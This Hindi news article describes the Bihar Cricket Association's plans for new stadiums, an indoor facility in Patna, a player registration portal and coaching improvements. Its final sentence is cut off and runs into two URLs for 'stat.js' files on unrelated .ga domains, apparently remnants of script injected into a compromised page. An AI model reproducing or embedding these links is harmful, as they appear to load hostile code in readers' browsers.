बिहार में क्रिकेट के इन्फ्रास्ट्रक्चर को तैयार करने के लिए बिहार क्रिकेट एसोसिएशन (बीसीए) हरसंभव प्रयास कर रहा है. इसके लिए कमेटी का गठन कर संभावनाओं की तलाश की जा रही है. बीसीए अध्यक्ष राकेश कुमार तिवारी ने बताया कि बिहार के पांच जोनों में स्टेडियम के निर्माण की दिशा में कमेटी काम कर रही है. हर जिले में कोचिंग कैंप तैयार करने की भी योजना है. गोपालगंज में 15 करोड़ की लागत से स्टेडियम निर्माण की योजना प्राथमिकता सूची में है. इसके अलावा गया, भागलपुर, जमुई और मुजफ्फरपुर से भी स्टेडियम निर्माण के लिए जमीन देने का प्रस्ताव बीसीए को प्राप्त हुआ है।

इंडोर स्टेडियम भी बनेगा : बीसीए अध्यक्ष की पहल पर बीसीसीआइ अध्यक्ष ने बिहार को गोद लिया है. यहां इंडोर स्टेडियम बनाने का प्रस्ताव भी है. इन्फ्रास्ट्रक्चर कमेटी इसके लिए पटना में दो एकड़ जमीन तलाश रही है. बीसीसीआइ अध्यक्ष सौरभ गांगुली ने इस काम के लिए नोवा भट्टाचार्य को संयोजक बनाया है. ऊर्जा स्टेडियम की तरह ही बिहार में दो स्टेडियम के निर्माण का प्रस्ताव बजट में किया गया है।

खेल के क्षेत्र में पारदर्शिता लाने के लिए खिलाड़ियों को रजिस्ट्रेशन कराने के लिए पोर्टल का भी शुभारंभ किया गया है. दो बार बिहार के रणजी खिलाड़ियों, कोच, फिजियो और ट्रेनरों का सेमिनार कर इसलिए सुझाव लिया गया कि बिहार के खिलाड़ियों को कम संसाधन में अन्य प्रदेश के खिलाड़ियों के मुकाबले कैसे खड़ा किया जाये. बेहतर कोच, ट्रेनर और फिजियो की व्यवस्था कर खिलाड़ियों को मानसिक रूप से मजबूत किया जायेगा. बेहतर प्रशिक्षण केंद्र की व्यवस्था की जायेगी. अध्यक्ष ने कहा कि मैं पूरे बिहार के खिलाड़ियों और खेल प्रेमियों से आग्रह करता हूं कि सकारात्मक पहल कर पूरे देश में बिहार की छवि को साफ सुथरी बनाने के लिए सहयोग करें. 17 सालों के वनवास के बाद बिहार को मान्यता मिली है तो, कुछ बेहतर करने की चुनौतियां भी सामने हैं. इस चुनौती के साथ नयी कमेटी हरसंभव प्रयास कर रहीhttps://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.